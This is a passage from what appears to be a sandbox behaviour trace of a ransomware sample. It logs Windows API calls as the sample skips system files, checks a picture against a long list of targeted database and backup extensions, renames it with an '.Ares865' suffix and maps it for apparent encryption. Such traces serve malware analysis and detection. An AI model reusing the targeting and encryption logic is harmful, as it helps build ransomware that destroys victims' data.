ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="aoldtz.exe") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="..") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="windows") returned -1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="bootmgr") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="temp") returned -1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="pagefile.sys") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="boot") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="ids.txt") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="ntuser.dat") returned 1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="perflogs") returned -1 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2="MSBuild") returned 1 [0046.611] lstrlenW (lpString="Penguins.jpg") returned 12 [0046.611] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 55 [0046.611] lstrcpyW (in: lpString1=0x2cce452, lpString2="Penguins.jpg" | out: lpString1="Penguins.jpg") returned="Penguins.jpg" [0046.611] lstrlenW (lpString="Penguins.jpg") returned 12 [0046.611] lstrlenW (lpString="Ares865") returned 7 [0046.611] lstrcmpiW (lpString1="ins.jpg", lpString2="Ares865") returned 1 [0046.611] lstrlenW (lpString=".dll") returned 4 [0046.611] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".dll") returned 1 [0046.612] lstrlenW (lpString=".lnk") returned 4 [0046.612] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".lnk") returned 1 [0046.612] lstrlenW (lpString=".ini") returned 4 [0046.612] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".ini") returned 1 [0046.612] lstrlenW (lpString=".sys") returned 4 [0046.612] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".sys") returned 1 [0046.612] lstrlenW (lpString="Penguins.jpg") returned 12 [0046.612] lstrlenW (lpString="bak") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0046.612] lstrlenW (lpString="ba_") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0046.612] lstrlenW (lpString="dbb") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0046.612] lstrlenW (lpString="vmdk") returned 4 [0046.612] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0046.612] lstrlenW (lpString="rar") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0046.612] lstrlenW (lpString="zip") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0046.612] lstrlenW (lpString="tgz") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0046.612] lstrlenW (lpString="vbox") returned 4 [0046.612] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0046.612] lstrlenW (lpString="vdi") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0046.612] lstrlenW (lpString="vhd") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0046.612] lstrlenW (lpString="vhdx") returned 4 [0046.612] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0046.612] lstrlenW (lpString="avhd") returned 4 [0046.612] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0046.612] lstrlenW (lpString="db") returned 2 [0046.612] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0046.612] lstrlenW (lpString="db2") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0046.612] lstrlenW (lpString="db3") returned 3 [0046.612] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0046.612] lstrlenW (lpString="dbf") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0046.613] lstrlenW (lpString="mdf") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0046.613] lstrlenW (lpString="mdb") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0046.613] lstrlenW (lpString="sql") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0046.613] lstrlenW (lpString="sqlite") returned 6 [0046.613] lstrcmpiW (lpString1="ns.jpg", lpString2="sqlite") returned -1 [0046.613] lstrlenW (lpString="sqlite3") returned 7 [0046.613] lstrcmpiW (lpString1="ins.jpg", lpString2="sqlite3") returned -1 [0046.613] lstrlenW (lpString="sqlitedb") returned 8 [0046.613] lstrcmpiW (lpString1="uins.jpg", lpString2="sqlitedb") returned 1 [0046.613] lstrlenW (lpString="xml") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0046.613] lstrlenW (lpString="$er") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0046.613] lstrlenW (lpString="4dd") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0046.613] lstrlenW (lpString="4dl") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0046.613] lstrlenW (lpString="^^^") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0046.613] lstrlenW (lpString="abs") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0046.613] lstrlenW (lpString="abx") returned 3 [0046.613] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0046.613] lstrlenW (lpString="accdb") returned 5 [0046.613] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0046.613] lstrlenW (lpString="accdc") returned 5 [0046.613] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0046.613] lstrlenW (lpString="accde") returned 5 [0046.613] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0046.613] lstrlenW (lpString="accdr") returned 5 [0046.613] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0046.613] lstrlenW (lpString="accdt") returned 5 [0046.613] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0046.614] lstrlenW (lpString="accdw") returned 5 [0046.614] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0046.614] lstrlenW (lpString="accft") returned 5 [0046.614] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0046.614] lstrlenW (lpString="adb") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.614] lstrlenW (lpString="adb") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.614] lstrlenW (lpString="ade") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0046.614] lstrlenW (lpString="adf") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0046.614] lstrlenW (lpString="adn") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0046.614] lstrlenW (lpString="adp") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0046.614] lstrlenW (lpString="alf") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0046.614] lstrlenW (lpString="ask") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0046.614] lstrlenW (lpString="btr") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0046.614] lstrlenW (lpString="cat") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0046.614] lstrlenW (lpString="cdb") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0046.614] lstrlenW (lpString="ckp") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0046.614] lstrlenW (lpString="cma") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0046.614] lstrlenW (lpString="cpd") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0046.614] lstrlenW (lpString="dacpac") returned 6 [0046.614] lstrcmpiW (lpString1="ns.jpg", lpString2="dacpac") returned 1 [0046.614] lstrlenW (lpString="dad") returned 3 [0046.614] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0046.614] lstrlenW (lpString="dadiagrams") returned 10 [0046.615] lstrcmpiW (lpString1="nguins.jpg", lpString2="dadiagrams") returned 1 [0046.615] lstrlenW (lpString="daschema") returned 8 [0046.615] lstrcmpiW (lpString1="uins.jpg", lpString2="daschema") returned 1 [0046.615] lstrlenW (lpString="db-journal") returned 10 [0046.615] lstrcmpiW (lpString1="nguins.jpg", lpString2="db-journal") returned 1 [0046.615] lstrlenW (lpString="db-shm") returned 6 [0046.615] lstrcmpiW (lpString1="ns.jpg", lpString2="db-shm") returned 1 [0046.615] lstrlenW (lpString="db-wal") returned 6 [0046.615] lstrcmpiW (lpString1="ns.jpg", lpString2="db-wal") returned 1 [0046.615] lstrlenW (lpString="dbc") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0046.615] lstrlenW (lpString="dbs") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0046.615] lstrlenW (lpString="dbt") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0046.615] lstrlenW (lpString="dbv") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0046.615] lstrlenW (lpString="dbx") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0046.615] lstrlenW (lpString="dcb") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0046.615] lstrlenW (lpString="dct") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0046.615] lstrlenW (lpString="dcx") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0046.615] lstrlenW (lpString="ddl") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0046.615] lstrlenW (lpString="dlis") returned 4 [0046.615] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0046.615] lstrlenW (lpString="dp1") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0046.615] lstrlenW (lpString="dqy") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0046.615] lstrlenW (lpString="dsk") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0046.615] lstrlenW (lpString="dsn") returned 3 [0046.615] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0046.616] lstrlenW (lpString="dtsx") returned 4 [0046.616] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0046.616] lstrlenW (lpString="dxl") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0046.616] lstrlenW (lpString="eco") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0046.616] lstrlenW (lpString="ecx") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0046.616] lstrlenW (lpString="edb") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0046.616] lstrlenW (lpString="epim") returned 4 [0046.616] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0046.616] lstrlenW (lpString="fcd") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0046.616] lstrlenW (lpString="fdb") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0046.616] lstrlenW (lpString="fic") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0046.616] lstrlenW (lpString="flexolibrary") returned 12 [0046.616] lstrlenW (lpString="fm5") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0046.616] lstrlenW (lpString="fmp") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0046.616] lstrlenW (lpString="fmp12") returned 5 [0046.616] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0046.616] lstrlenW (lpString="fmpsl") returned 5 [0046.616] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0046.616] lstrlenW (lpString="fol") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0046.616] lstrlenW (lpString="fp3") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0046.616] lstrlenW (lpString="fp4") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0046.616] lstrlenW (lpString="fp5") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0046.616] lstrlenW (lpString="fp7") returned 3 [0046.616] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0046.617] lstrlenW (lpString="fpt") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0046.617] lstrlenW (lpString="frm") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0046.617] lstrlenW (lpString="gdb") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.617] lstrlenW (lpString="gdb") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.617] lstrlenW (lpString="grdb") returned 4 [0046.617] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0046.617] lstrlenW (lpString="gwi") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0046.617] lstrlenW (lpString="hdb") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0046.617] lstrlenW (lpString="his") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0046.617] lstrlenW (lpString="ib") returned 2 [0046.617] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0046.617] lstrlenW (lpString="idb") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0046.617] lstrlenW (lpString="ihx") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0046.617] lstrlenW (lpString="itdb") returned 4 [0046.617] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0046.617] lstrlenW (lpString="itw") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0046.617] lstrlenW (lpString="jet") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0046.617] lstrlenW (lpString="jtx") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0046.617] lstrlenW (lpString="kdb") returned 3 [0046.617] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0046.617] lstrlenW (lpString="kexi") returned 4 [0046.617] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0046.617] lstrlenW (lpString="kexic") returned 5 [0046.617] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0046.617] lstrlenW (lpString="kexis") returned 5 [0046.617] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0046.617] lstrlenW (lpString="lgc") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0046.618] lstrlenW (lpString="lwx") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0046.618] lstrlenW (lpString="maf") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0046.618] lstrlenW (lpString="maq") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0046.618] lstrlenW (lpString="mar") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0046.618] lstrlenW (lpString="marshal") returned 7 [0046.618] lstrcmpiW (lpString1="ins.jpg", lpString2="marshal") returned -1 [0046.618] lstrlenW (lpString="mas") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0046.618] lstrlenW (lpString="mav") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0046.618] lstrlenW (lpString="maw") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0046.618] lstrlenW (lpString="mdbhtml") returned 7 [0046.618] lstrcmpiW (lpString1="ins.jpg", lpString2="mdbhtml") returned -1 [0046.618] lstrlenW (lpString="mdn") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0046.618] lstrlenW (lpString="mdt") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0046.618] lstrlenW (lpString="mfd") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0046.618] lstrlenW (lpString="mpd") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0046.618] lstrlenW (lpString="mrg") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0046.618] lstrlenW (lpString="mud") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0046.618] lstrlenW (lpString="mwb") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0046.618] lstrlenW (lpString="myd") returned 3 [0046.618] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0046.618] lstrlenW (lpString="ndf") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0046.619] lstrlenW (lpString="nnt") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0046.619] lstrlenW (lpString="nrmlib") returned 6 [0046.619] lstrcmpiW (lpString1="ns.jpg", lpString2="nrmlib") returned 1 [0046.619] lstrlenW (lpString="ns2") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0046.619] lstrlenW (lpString="ns3") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0046.619] lstrlenW (lpString="ns4") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0046.619] lstrlenW (lpString="nsf") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0046.619] lstrlenW (lpString="nv") returned 2 [0046.619] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0046.619] lstrlenW (lpString="nv2") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0046.619] lstrlenW (lpString="nwdb") returned 4 [0046.619] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0046.619] lstrlenW (lpString="nyf") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0046.619] lstrlenW (lpString="odb") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.619] lstrlenW (lpString="odb") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.619] lstrlenW (lpString="oqy") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0046.619] lstrlenW (lpString="ora") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0046.619] lstrlenW (lpString="orx") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0046.619] lstrlenW (lpString="owc") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0046.619] lstrlenW (lpString="p96") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0046.619] lstrlenW (lpString="p97") returned 3 [0046.619] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0046.620] lstrlenW (lpString="pan") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0046.620] lstrlenW (lpString="pdb") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0046.620] lstrlenW (lpString="pdm") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0046.620] lstrlenW (lpString="pnz") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0046.620] lstrlenW (lpString="qry") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0046.620] lstrlenW (lpString="qvd") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0046.620] lstrlenW (lpString="rbf") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0046.620] lstrlenW (lpString="rctd") returned 4 [0046.620] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0046.620] lstrlenW (lpString="rod") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0046.620] lstrlenW (lpString="rodx") returned 4 [0046.620] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0046.620] lstrlenW (lpString="rpd") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0046.620] lstrlenW (lpString="rsd") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0046.620] lstrlenW (lpString="sas7bdat") returned 8 [0046.620] lstrcmpiW (lpString1="uins.jpg", lpString2="sas7bdat") returned 1 [0046.620] lstrlenW (lpString="sbf") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0046.620] lstrlenW (lpString="scx") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0046.620] lstrlenW (lpString="sdb") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0046.620] lstrlenW (lpString="sdc") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0046.620] lstrlenW (lpString="sdf") returned 3 [0046.620] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0046.620] lstrlenW (lpString="sis") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0046.621] lstrlenW (lpString="spq") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0046.621] lstrlenW (lpString="te") returned 2 [0046.621] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0046.621] lstrlenW (lpString="teacher") returned 7 [0046.621] lstrcmpiW (lpString1="ins.jpg", lpString2="teacher") returned -1 [0046.621] lstrlenW (lpString="tmd") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0046.621] lstrlenW (lpString="tps") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0046.621] lstrlenW (lpString="trc") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.621] lstrlenW (lpString="trc") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.621] lstrlenW (lpString="trm") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0046.621] lstrlenW (lpString="udb") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0046.621] lstrlenW (lpString="udl") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0046.621] lstrlenW (lpString="usr") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0046.621] lstrlenW (lpString="v12") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0046.621] lstrlenW (lpString="vis") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0046.621] lstrlenW (lpString="vpd") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0046.621] lstrlenW (lpString="vvv") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0046.621] lstrlenW (lpString="wdb") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0046.621] lstrlenW (lpString="wmdb") returned 4 [0046.621] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0046.621] lstrlenW (lpString="wrk") returned 3 [0046.621] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0046.622] lstrlenW (lpString="xdb") returned 3 [0046.622] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0046.622] lstrlenW (lpString="xld") returned 3 [0046.622] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0046.622] lstrlenW (lpString="xmlff") returned 5 [0046.622] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0046.622] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.Ares865") returned 61 [0046.622] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.ares865"), dwFlags=0x1) returned 1 [0046.622] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0046.622] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=777835) returned 1 [0046.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0046.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb490 [0046.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0046.623] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0046.624] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0046.624] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0046.624] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbe170, lpName=0x0) returned 0x12c [0046.626] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbe170) returned 0x1120000 [0046.682] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0046.683] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0046.683] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0046.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb18 [0046.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb18 | out: hHeap=0x2b0000) returned 1 [0046.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2710 [0046.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0046.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0046.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0046.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0046.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0046.684] HeapFree 